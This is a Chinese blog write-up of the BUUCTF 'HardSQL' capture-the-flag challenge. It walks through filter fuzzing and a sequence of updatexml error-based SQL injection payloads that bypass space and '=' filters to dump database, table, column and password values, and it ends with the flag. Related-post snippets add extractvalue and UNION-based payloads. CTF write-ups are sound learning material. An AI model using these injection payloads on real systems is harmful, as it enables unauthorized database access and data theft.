BUUCTF之HardSQL[极客大挑战 2019]

最新推荐文章于 2025-07-04 20:12:37 发布
最新推荐文章于 2025-07-04 20:12:37 发布
阅读量1.7k 收藏 6
点赞数 5
CC 4.0 BY-SA版权
分类专栏: CTFのWriteUp 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2872253606/article/details/125151924
本文详细描述了一次SQL注入攻击的过程,通过使用burpsuit进行fuzz测试,发现过滤规则并利用报错盲注来规避限制。作者展示了如何探测数据库名、表名、字段名以及获取敏感数据,最终揭示了部分flag。文章突出了SQL注入漏洞的利用技巧和数据库信息的探测方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

打开连接

burpsuit抓包,跑一下fuzz

 

等fuzz跑完

 

发现长度为736的都被过滤掉了,用户名输入1'or'1'#

登入成功,说明闭合号为单引号

 

根据上面的fuzz,union联合注入被过掉了,=布尔盲注也被过滤掉了,发现报错盲注的关键字没被过滤掉,被过滤掉的空格可以用

 这些代替,

 尝试登入

发现错误,应该是ascii码没有转化成相应的字符导致的,但是我们还能用括号代替空格,先简单地看一下数据库名

1'or(updatexml(0,concat(0x5e,database()),0))#

再看一下表名,这里=可以用like代替

1'or(updatexml(0,concat(0x5e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))),0))#

 

接着爆字段名

1'or(updatexml(0,concat(0x5e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),0))#

 

接着查看值

1'or(updatexml(0,concat(0x5e,(select(group_concat(password))from(H4rDsq1))),0))#

 因为报错只能回显32位字符串,这里只回显了一部分的flag,接着用截断函数right查看身下的部分 

1'or(updatexml(0,concat(0x5e,right((select(group_concat(password))from(H4rDsq1)),31)),0))#

 

拼接起来就拿到flag了

flag{c1c437c7-b54b-43fc-8ad2-324df886c2a9}

 

BUUCTF——[极客挑战 2019]HardSQL
doraemon12345的博客
06-01 361
打开题目,进行常规注入,发现都行不通,union、空格和and被过滤了,尝试extractvalue()报错注入可行,开始做题,建议做的时候可以先用burp抓包在里面做,在网页上做请先带好痛苦面具(有耐心的当我没说,嘿嘿)。 先爆库名: payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23 得到库名爆表名: payload:?username=1&password=12
极客挑战2019Hardsql
uuzfumo的博客
11-06 479
SQL注入报错注入类型的相关题目,涉及一部分的绕过知识
buuctf-[极客挑战 2019]HardSQL(小宇特详解)
小宇的web博客
01-26 3392
buuctf-[极客挑战 2019]HardSQL(小宇特详解) 遇到了SQL注入,先尝试一下万能密码,虽然感觉%100不能用 果不其然 双写再试一下发现也不行 这里使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号 使用extractvalue() /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database
[极客挑战 2019]HardSQL
最新发布
2301_79806187的博客
07-04 940
布尔盲注 报错注入
BUUCTF---web---[极客挑战 2019]HardSQL
2201_75556700的博客
05-19 1018
7、 太可恶了,只爆出了一半,问题不,我们使用right()函数,爆出password的 ,一般flag的长度为32位,加上前面爆出了概有二十来个,继续爆右边概15个就可以凑完整,不放心的话,可以爆长点。2、使用万能密码发现不可以,这种题前面有很多,这道题用前面的绕过方法不行,得换一种前面没有用过的方法,最近刚学了报错注入,前面就没有用这个方法,这里试试。查阅资料后发现需要构造下面的方法 and用^替换,#用%23替换,空格用()替换。4、用类似的方法查表名:这里注意=用like替换。
BUUCTF [极客挑战 2019]HardSQL
m0_63253040的博客
03-28 2433
还是这个熟悉的登录页面 尝试万能密码登录,发现有过滤,一个一个试 过滤了空格,=,等等许多,双写也无法绕过,那么换报错注入试试
buuctf-HardSQL
m0_62094846的博客
04-02 1469
这道题过滤了很多sql注入的关键词(可以用bp,fuzz出来,下次试试) 包括空格,但是没有过滤报错注入的两个关键词updatexml和extractvalue 用报错注入 查库名(geek) ?username=1'or(updatexml(1,concat(0x7e,(database()),0x7e),1))%23&password=1 查找所有数据库 ?username=admin'or(updatexml(1,concat(0x7e,(select(grou...
Buuctf Web题解
weixin_68029979的博客
04-24 2098
写在前面, 本人小白一枚,记录一下web做题过程,部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web题,所以有些题会没有思路,这时会参考其他佬的题解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在题解中,可能并没有说清除为什么是这样,什么要这样,其实部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有题目没有题解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
练习 12 Web [极客挑战 2019]BabySQL
离暑假还有41天的博客
03-22 366
本题复习:1.常规的万能语句+SQL查询,union联合查询,Extractvalue()报错注入** **extractvalue(1,concat(‘0x7e’,select(database())))%23**
BUUCTF-WEB
ccfly1012的博客
11-02 4148
目录 [HCTF 2018]WarmUp [极客挑战 2019]EasySQL 总结万能密码 [极客挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF [极客挑战 2019] HardSQL 1
m0_74167420的博客
06-18 496
原因:在输入' 或者 # 号时,'会被识别出来过滤掉,#会注释掉后面的内容,因此要进行url编码。在该题目中,双写被过滤掉了,同时空格,=,union也被过滤了。或者, payload为: 用 ^ 符号代替 or。1、阅读题目,是SQL注入的题目类型。2、尝试万能密码和堆叠注入,均被过滤。
[BUUCTF刷题]HardSQL
weixin_43952190的博客
07-03 2165
HardSQL 进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。 发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。 也过滤了空格,使用括号绕过。 首先,注数据库名称 username=admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23&password=1 然后得到表名(过滤=,使用like) userna
BUUCTFHardSQL
徐徐徐的博客
09-04 832
使用以下字符替代空格,可以起到相同效果或使用和。
[BUUCTF]HardSQL(writeup)
weixin_63306244的博客
06-22 377
这是因为extractvalue函数限制了一次字符串只能输出32位。所以就用常用的" like "和" () "来绕过。发现select、ascii、空格、=等被过滤。输入admin / 2'or'1。使用bp试试看过滤了哪些东西。因为“=”、“空格”被过滤了。sql注入题进入后直接惯例。就确定了需要用报错注入来做。由此类推下去得到下一句语句。他只给了你前半段的flag。得到数据库名后构造下一句。这是为什么,那该怎么办呢。但是当你输入后会发现。再加上之前页面的报错。
BUUCTF----[极客挑战 2019]HardSQL
woshicainiao666的博客
03-09 631
报错注入updatexml()
buuctf题目[极客挑战 2019]LoveSQL
01-26
### BUUCTF 极客挑战 2019 LoveSQL 题目解答 #### SQL 注入基础 在处理 SQL 注入攻击时,了解如何利用特定的 payload 来绕过验证机制至关重要。对于 `LoveSQL` 这道题目,在之前的题目中已经展示了通过万能密码完成注入的方法[^1]。 #### 获取表结构信息 为了进一步探索数据库中的数据,可以使用联合查询(UNION SELECT)来获取更多关于目标数据库的信息。具体来说,可以通过以下 Payload 获得名为 `l0ve1ysq1` 的表字段名称: ```sql 1' UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='l0ve1ysq1'# ``` 这一步骤有助于理解该表的具体结构以及可能存在的敏感信息位置[^2]。 #### 查找 Flag 所在表格 考虑到 CTF 比赛中常见的规律——Flag 往往存储于当前使用的数据库内,因此可以直接尝试提取所有表的名字并寻找其中是否存在潜在的目标对象。此时可采用如下 Payload 实现这一操作: ```sql a' UNION SELECT 1,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE()),3 -- a ``` 此方法能够帮助确认哪些表可能是存放 Flag 的候选者之一[^3]。 #### 数据库元数据访问 除了上述手段外,还可以借助 MySQL 提供的 INFORMATION_SCHEMA.SCHEMA 表来查看整个实例下的所有数据库列表。这对于全面掌握环境背景非常有用: ```sql SHOW DATABASES; ``` 这条命令的结果来源于 SCHEMATA 表,它记录了有关各个数据库的基本详情[^4]。 综上所述,解决 `LoveSQL` 题目的关键是逐步深入挖掘数据库内部结构,并最终定位到包含 Flag 的确切位置。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值